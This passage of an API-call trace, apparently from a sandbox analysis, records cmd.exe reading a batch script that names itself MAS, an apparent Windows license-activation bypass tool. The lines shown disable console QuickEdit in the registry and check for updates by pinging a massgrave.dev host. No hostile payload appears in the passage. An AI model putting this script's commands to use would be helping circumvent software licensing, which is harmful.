lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=6220, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x184c [0176.455] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _MASunattended set quedit=1\r\n", cbMultiByte=40, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if defined _MASunattended set quedit=1\r\nscript window pauses the operation and leads to the confusion that script stopped due to an error\r\n") returned 40 [0176.455] _get_osfhandle (_FileHandle=3) returned 0xac [0176.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x184c [0176.456] _get_osfhandle (_FileHandle=3) returned 0xac [0176.456] GetFileType (hFile=0xac) returned 0x1 [0176.456] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x184c [0176.456] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.456] SetFilePointer (in: hFile=0xac, lDistanceToMove=6282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x188a [0176.456] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for %%# in (%_args%) do (if /i \"%%#\"==\"-qedit\" set quedit=1)\r\n", cbMultiByte=62, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="for %%# in (%_args%) do (if /i \"%%#\"==\"-qedit\" set quedit=1)\r\nhe operation and leads to the confusion that script stopped due to an error\r\n") returned 62 [0176.456] _get_osfhandle (_FileHandle=3) returned 0xac [0176.456] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x188a [0176.456] _get_osfhandle (_FileHandle=3) returned 0xac [0176.456] GetFileType (hFile=0xac) returned 0x1 [0176.456] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x188a [0176.456] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.456] SetFilePointer (in: hFile=0xac, lDistanceToMove=6284, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x188c [0176.456] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nr %%# in (%_args%) do (if /i \"%%#\"==\"-qedit\" set quedit=1)\r\n") returned 2 [0176.456] _get_osfhandle (_FileHandle=3) returned 0xac [0176.456] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x188c [0176.456] _get_osfhandle (_FileHandle=3) returned 0xac [0176.456] GetFileType (hFile=0xac) returned 0x1 [0176.456] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x188c [0176.456] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.456] SetFilePointer (in: hFile=0xac, lDistanceToMove=6378, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x18ea [0176.456] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="reg query HKCU\\Console /v QuickEdit %nul2% | find /i \"0x0\" %nul1% || if not defined quedit (\r\n", cbMultiByte=94, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="reg query HKCU\\Console /v QuickEdit %nul2% | find /i \"0x0\" %nul1% || if not defined quedit (\r\nnfusion that script stopped due to an error\r\n") returned 94 [0176.457] _get_osfhandle (_FileHandle=3) returned 0xac [0176.457] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x18ea [0176.457] _get_osfhandle (_FileHandle=3) returned 0xac [0176.457] GetFileType (hFile=0xac) returned 0x1 [0176.457] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x18ea [0176.457] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.457] SetFilePointer (in: hFile=0xac, lDistanceToMove=6443, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x192b [0176.457] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="reg add HKCU\\Console /v QuickEdit /t REG_DWORD /d \"0\" /f %nul1%\r\n", cbMultiByte=65, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="reg add HKCU\\Console /v QuickEdit /t REG_DWORD /d \"0\" /f %nul1%\r\n || if not defined quedit (\r\n") returned 65 [0176.457] _get_osfhandle (_FileHandle=3) returned 0xac [0176.457] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x192b [0176.457] _get_osfhandle (_FileHandle=3) returned 0xac [0176.457] GetFileType (hFile=0xac) returned 0x1 [0176.457] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x192b [0176.457] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.457] SetFilePointer (in: hFile=0xac, lDistanceToMove=6488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1958 [0176.457] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="start cmd.exe /c \"\"!_batf!\" %_args% -qedit\"\r\n", cbMultiByte=45, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="start cmd.exe /c \"\"!_batf!\" %_args% -qedit\"\r\nD /d \"0\" /f %nul1%\r\n") returned 45 [0176.457] _get_osfhandle (_FileHandle=3) returned 0xac [0176.457] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1958 [0176.457] _get_osfhandle (_FileHandle=3) returned 0xac [0176.457] GetFileType (hFile=0xac) returned 0x1 [0176.457] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1958 [0176.457] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.458] SetFilePointer (in: hFile=0xac, lDistanceToMove=6616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19d8 [0176.458] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="rem quickedit reset code is added at the starting of the script instead of here because it takes time to reflect in some cases\r\n", cbMultiByte=128, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="rem quickedit reset code is added at the starting of the script instead of here because it takes time to reflect in some cases\r\n an error\r\n") returned 128 [0176.458] _get_osfhandle (_FileHandle=3) returned 0xac [0176.458] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19d8 [0176.458] _get_osfhandle (_FileHandle=3) returned 0xac [0176.458] GetFileType (hFile=0xac) returned 0x1 [0176.458] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19d8 [0176.458] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.458] SetFilePointer (in: hFile=0xac, lDistanceToMove=6625, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e1 [0176.458] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="exit /b\r\nedit reset code is added at the starting of the script instead of here because it takes time to reflect in some cases\r\n") returned 9 [0176.458] _get_osfhandle (_FileHandle=3) returned 0xac [0176.458] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e1 [0176.458] _get_osfhandle (_FileHandle=3) returned 0xac [0176.458] GetFileType (hFile=0xac) returned 0x1 [0176.458] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e1 [0176.458] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.458] SetFilePointer (in: hFile=0xac, lDistanceToMove=6628, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e4 [0176.458] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\nt /b\r\n") returned 3 [0176.458] _get_osfhandle (_FileHandle=3) returned 0xac [0176.458] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e4 [0176.458] _get_osfhandle (_FileHandle=3) returned 0xac [0176.458] GetFileType (hFile=0xac) returned 0x1 [0176.459] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e4 [0176.459] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.459] SetFilePointer (in: hFile=0xac, lDistanceToMove=6630, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e6 [0176.459] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.459] _get_osfhandle (_FileHandle=3) returned 0xac [0176.459] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e6 [0176.459] _get_osfhandle (_FileHandle=3) returned 0xac [0176.459] GetFileType (hFile=0xac) returned 0x1 [0176.459] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e6 [0176.459] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.459] SetFilePointer (in: hFile=0xac, lDistanceToMove=6770, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a72 [0176.459] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.459] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.459] _get_osfhandle (_FileHandle=3) returned 0xac [0176.459] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a72 [0176.459] _get_osfhandle (_FileHandle=3) returned 0xac [0176.459] GetFileType (hFile=0xac) returned 0x1 [0176.459] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a72 [0176.459] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.459] SetFilePointer (in: hFile=0xac, lDistanceToMove=6772, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a74 [0176.459] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.460] _get_osfhandle (_FileHandle=3) returned 0xac [0176.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a74 [0176.460] _get_osfhandle (_FileHandle=3) returned 0xac [0176.460] GetFileType (hFile=0xac) returned 0x1 [0176.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a74 [0176.460] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=6795, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8b [0176.460] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Check for updates\r\n", cbMultiByte=23, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: Check for updates\r\n===================================================================================================================\r\n") returned 23 [0176.460] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.460] _get_osfhandle (_FileHandle=3) returned 0xac [0176.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8b [0176.460] _get_osfhandle (_FileHandle=3) returned 0xac [0176.460] GetFileType (hFile=0xac) returned 0x1 [0176.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8b [0176.460] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=6797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8d [0176.460] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n Check for updates\r\n") returned 2 [0176.460] _get_osfhandle (_FileHandle=3) returned 0xac [0176.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8d [0176.460] _get_osfhandle (_FileHandle=3) returned 0xac [0176.460] GetFileType (hFile=0xac) returned 0x1 [0176.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a8d [0176.461] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.461] SetFilePointer (in: hFile=0xac, lDistanceToMove=6805, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a95 [0176.461] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set -=\r\n", cbMultiByte=8, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set -=\r\nk for updates\r\n") returned 8 [0176.461] _get_osfhandle (_FileHandle=3) returned 0xac [0176.461] _get_osfhandle (_FileHandle=3) returned 0xac [0176.461] GetFileType (hFile=0xac) returned 0x1 [0176.461] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.461] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set old=\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set old=\r\nfor updates\r\n") returned 10 [0176.461] _get_osfhandle (_FileHandle=3) returned 0xac [0176.461] _get_osfhandle (_FileHandle=3) returned 0xac [0176.461] GetFileType (hFile=0xac) returned 0x1 [0176.461] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.461] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt old=\r\n") returned 2 [0176.461] _get_osfhandle (_FileHandle=3) returned 0xac [0176.461] _get_osfhandle (_FileHandle=3) returned 0xac [0176.461] GetFileType (hFile=0xac) returned 0x1 [0176.461] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.461] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for /f \"delims=[] tokens=2\" %%# in ('ping -4 -n 1 updatecheck.mass%-%grave.dev') do (\r\n", cbMultiByte=87, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=[] tokens=2\" %%# in ('ping -4 -n 1 updatecheck.mass%-%grave.dev') do (\r\n===================================================\r\n") returned 87 [0176.462] _get_osfhandle (_FileHandle=3) returned 0xac [0176.462] _get_osfhandle (_FileHandle=3) returned 0xac [0176.462] GetFileType (hFile=0xac) returned 0x1 [0176.462] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.462] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not [%%#]==[] (echo \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n", cbMultiByte=115, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not [%%#]==[] (echo \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 115 [0176.462] _get_osfhandle (_FileHandle=3) returned 0xac [0176.462] _get_osfhandle (_FileHandle=3) returned 0xac [0176.462] GetFileType (hFile=0xac) returned 0x1 [0176.462] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.462] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\nnot [%%#]==[] (echo \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n") returned 3 [0176.462] _get_osfhandle (_FileHandle=3) returned 0xac [0176.462] _get_osfhandle (_FileHandle=3) returned 0xac [0176.462] GetFileType (hFile=0xac) returned 0x1 [0176.462] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.462] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.462] _get_osfhandle (_FileHandle=3) returned 0xac [0176.462] _get_osfhandle (_FileHandle=3) returned 0xac [0176.462] GetFileType (hFile=0xac) returned 0x1 [0176.462] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.463] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined old (\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if defined old (\r\necho \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n") returned 18 [0176.463] _get_osfhandle (_FileHandle=3) returned 0xac [0176.463] _get_osfhandle (_FileHandle=3) returned 0xac [0176.463] GetFileType (hFile=0xac) returned 0x1 [0176.463] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.463] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ________________________________________________\r\n", cbMultiByte=55, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo ________________________________________________\r\n(echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n") returned 55 [0176.463] _get_osfhandle (_FileHandle=3) returned 0xac [0176.463] _get_osfhandle (_FileHandle=3) returned 0xac [0176.463] GetFileType (hFile=0xac) returned 0x1 [0176.463] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.463] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%eline%\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%eline%\r\n____________________________________________\r\n") returned 9 [0176.463] _get_osfhandle (_FileHandle=3) returned 0xac [0176.463] _get_osfhandle (_FileHandle=3) returned 0xac [0176.463] GetFileType (hFile=0xac) returned 0x1 [0176.463] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.463] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo You are running outdated version MAS %masver%\r\n", cbMultiByte=52, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo You are running outdated version MAS %masver%\r\n_\r\n") returned 52 [0176.463] _get_osfhandle (_FileHandle=3) returned 0xac [0176.463] _get_osfhandle (_FileHandle=3) returned 0xac [0176.463] GetFileType (hFile=0xac) returned 0x1 [0176.464] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.464] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ________________________________________________\r\n", cbMultiByte=55, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo ________________________________________________\r\n") returned 55 [0176.464] _get_osfhandle (_FileHandle=3) returned 0xac [0176.464] _get_osfhandle (_FileHandle=3) returned 0xac [0176.464] GetFileType (hFile=0xac) returned 0x1 [0176.464] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.464] MultiByteToWideChar (in: CodePage=0x1b5, 